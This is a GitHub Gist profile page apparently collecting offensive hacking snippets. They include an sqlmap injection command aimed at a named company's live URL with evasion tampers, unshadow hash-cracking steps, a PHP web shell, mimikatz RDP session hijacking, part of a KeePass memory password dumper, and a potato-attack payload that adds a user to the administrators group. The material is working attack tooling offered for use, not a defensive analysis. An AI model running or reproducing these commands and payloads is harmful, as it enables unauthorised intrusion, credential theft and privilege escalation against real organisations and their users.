Skip to content

Instantly share code, notes, and snippets.

View c0d3x27's full-sized avatar
:octocat:
Working from home

c0d3x27 c0d3x27

:octocat:
Working from home
View GitHub Profile
@c0d3x27
c0d3x27 / sqlmap
Last active April 18, 2024 00:00
Hacking Hackers 3
sqlmap -u https://documents.tesla.eu/busydoc.dc?id= --banner --random-agent -v 3 --tamper="apostrophemask,apostrophenullencode,between,chardoubleencode,charencode,charunicodeencode" --level=5 --risk=3 --dbms=mysql --current-db --current-user
The more information you feel the command the better it can perform
@c0d3x27
c0d3x27 / backdoors
Created February 5, 2024 14:09
hacking hackers
kali@kali:~$ unshadow passwd.txt shadow.txt
kali@kali:~$ unshadow passwd.txt shadow.txt > unshadowed.txt
@c0d3x27
c0d3x27 / Get in
Created February 5, 2024 13:22
hacking hackers
<html>
<body>
<form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>">
<input type="TEXT" name="cmd" autofocus id="cmd" size="80">
<input type="SUBMIT" value="Execute">
</form>
<pre>
<?php
if(isset($_GET['cmd']))
{
@c0d3x27
c0d3x27 / rdp
Last active July 24, 2023 14:59
how to rdp2
mimikatz # ts::remote /id:1 #This will fail if you didnt started the session as SYSTEM
mimikatz # privilege::debug
Privilege '20' OK
mimikatz # token::elevate
Token Id : 0
User name :
SID name : NT AUTHORITY\SYSTEM
640 {0;000003e7} 0 D 35719 NT AUTHORITY\SYSTEM S-1-5-18 (04g,31p) Primary
-> Impersonated !
@c0d3x27
c0d3x27 / drp1
Created July 24, 2023 14:44
How to rdp
mimikatz # ts::sessions
Session: 1 - RDP-Tcp#0
state: Active (0)
user : Administrator @ hacklab
Conn : 9/25/2021 2:09:14 AM
disc : 9/25/2021 2:09:13 AM
logon: 9/25/2021 12:35:03 AM
last : 9/25/2021 6:45:06 AM
curr : 9/25/2021 6:48:11 AM
sc create sesshijack binpath= "cmd.exe /k tscon 3 /dest:rdp-tcp#2"
net start sesshijack
@c0d3x27
c0d3x27 / Program.cs
Created June 21, 2023 09:25
keepass
using System.Runtime.InteropServices;
using System.Text.RegularExpressions;
namespace keepass_password_dumper
{
internal static class Program
{
private const string AllowedChars = "^[\x20-\x7E]+$";
private const int BufferSize = 524288;
@c0d3x27
c0d3x27 / cmd.exe
Last active June 21, 2023 10:40
keypass
dotnet run c:\test\KeePass.DMP
@c0d3x27
c0d3x27 / test.csproj
Last active June 21, 2023 09:23
keypass
<Project Sdk="Microsoft.NET.Sdk">
<PropertyGroup>
<OutputType>Exe</OutputType>
<TargetFramework>net7.0</TargetFramework>
<ImplicitUsings>enable</ImplicitUsings>
<Nullable>enable</Nullable>
</PropertyGroup>
</Project>
@c0d3x27
c0d3x27 / \main.c
Created June 8, 2023 15:35
potato attack
void DoStuff() {
// Replace all this code by your payload
STARTUPINFO si = { sizeof(STARTUPINFO) };
PROCESS_INFORMATION pi;
CreateProcess(L"c:\\windows\\system32\\cmd.exe",L" /C net localgroup administrators user /add",
NULL, NULL, FALSE, NORMAL_PRIORITY_CLASS, NULL, L"C:\\Windows", &si, &pi);
CloseHandle(pi.hProcess);
CloseHandle(pi.hThread);